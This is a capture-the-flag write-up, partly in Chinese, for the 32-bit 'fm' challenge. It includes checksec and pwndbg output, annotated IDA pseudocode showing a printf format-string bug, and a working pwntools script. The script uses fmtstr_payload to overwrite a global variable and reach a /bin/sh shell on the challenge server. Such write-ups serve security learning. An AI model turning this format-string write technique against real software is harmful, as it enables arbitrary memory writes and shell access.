
jarvisoj_fm

Ubuntu 16


0x01


checksec

[*] '/home/zelas/Desktop/pwn/jarvisoj_fm/fm'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x8048000)

IDA

main()

/*
 * IDA pseudocode of fm's main(). The global `x` and be_nice_to_people()
 * are defined elsewhere in the binary and are not shown here.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf[80]; // [esp+2Ch] [ebp-5Ch] BYREF
unsigned int v5; // [esp+7Ch] [ebp-Ch] -- stack-canary copy (checksec above: "Canary found")

v5 = __readgsdword(0x14u); // load the canary from TLS; the epilogue check is not shown in this pseudocode
be_nice_to_people(); // defined elsewhere in the binary
memset(buf, 0, sizeof(buf)); // zero-fill so a short read leaves buf NUL-terminated
read(0, buf, 0x50u); // reads at most 0x50 = 80 bytes = sizeof(buf): this is NOT a stack overflow.
                     // If all 80 bytes are filled, though, buf has no NUL terminator and the
                     // printf() below keeps reading past it.
printf(buf); // BUG (CWE-134): user-controlled format string. A crafted format can read the stack
             // and write to memory -- that is how `x` below ends up equal to 4.
             // Fix: printf("%s", buf); or fputs(buf, stdout);
printf("%d!\n", x); // x is a global in the writable .data segment (the writeup gives its address as 0x0804A02C)
if ( x == 4 ) // the only gate before the shell; x is never assigned in this function, so the
              // branch is unreachable unless the format-string bug above is used to change x
{
puts("running sh...");
system("/bin/sh"); // intentional CTF win condition
}
return 0;
}

//0x0804A02C

vmmap

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x8048000 0x8049000 r-xp 1000 0 /home/zelas/Desktop/pwn/jarvisoj_fm/fm
0x8049000 0x804a000 r--p 1000 0 /home/zelas/Desktop/pwn/jarvisoj_fm/fm
0x804a000 0x804b000 rw-p 1000 1000 /home/zelas/Desktop/pwn/jarvisoj_fm/fm
0xf7db5000 0xf7dd2000 r--p 1d000 0 /usr/lib/i386-linux-gnu/libc-2.33.so
0xf7dd2000 0xf7f2a000 r-xp 158000 1d000 /usr/lib/i386-linux-gnu/libc-2.33.so
0xf7f2a000 0xf7f9d000 r--p 73000 175000 /usr/lib/i386-linux-gnu/libc-2.33.so
0xf7f9d000 0xf7f9e000 ---p 1000 1e8000 /usr/lib/i386-linux-gnu/libc-2.33.so
0xf7f9e000 0xf7fa0000 r--p 2000 1e8000 /usr/lib/i386-linux-gnu/libc-2.33.so
0xf7fa0000 0xf7fa2000 rw-p 2000 1ea000 /usr/lib/i386-linux-gnu/libc-2.33.so
0xf7fa2000 0xf7fa9000 rw-p 7000 0 [anon_f7fa2]
0xf7fc3000 0xf7fc5000 rw-p 2000 0 [anon_f7fc3]
0xf7fc5000 0xf7fc9000 r--p 4000 0 [vvar]
0xf7fc9000 0xf7fcb000 r-xp 2000 0 [vdso]
0xf7fcb000 0xf7fcc000 r--p 1000 0 /usr/lib/i386-linux-gnu/ld-2.33.so
0xf7fcc000 0xf7fee000 r-xp 22000 1000 /usr/lib/i386-linux-gnu/ld-2.33.so
0xf7fee000 0xf7ffb000 r--p d000 23000 /usr/lib/i386-linux-gnu/ld-2.33.so
0xf7ffb000 0xf7ffd000 r--p 2000 2f000 /usr/lib/i386-linux-gnu/ld-2.33.so
0xf7ffd000 0xf7ffe000 rw-p 1000 31000 /usr/lib/i386-linux-gnu/ld-2.33.so
0xfffdd000 0xffffe000 rw-p 21000 0 [stack]

0x02


思路 fmt string

1.gdb找到fmtarg的位置

pwndbg> fmtarg 0xffffce7c
The index of format argument : 12 ("%11$p")

2.向x地址写入0x4

0x03


exp

# Solve script for the fm challenge (pwntools). It relies on main() passing
# the user's input straight to printf() as the format string.
from pwn import *

# Full pwntools I/O logging; useful while checking the argument offset.
context(log_level='debug')
# Local run (commented out) vs. the challenge's remote instance.
# io = process(['./fm'])
io = remote('node4.buuoj.cn', 29085)

# Address of the global x in .data, taken from the IDA listing above.
x = 0x0804A02C
# fmtstr_payload(offset, writes): offset 11 is the format-argument index
# measured with fmtarg in step 1 (the `%11$p` position). The resulting
# format makes printf() store 0x4 into x, so the `x == 4` check passes.
payload = fmtstr_payload(11, {x: 0x4})
io.sendline(payload)
io.interactive()

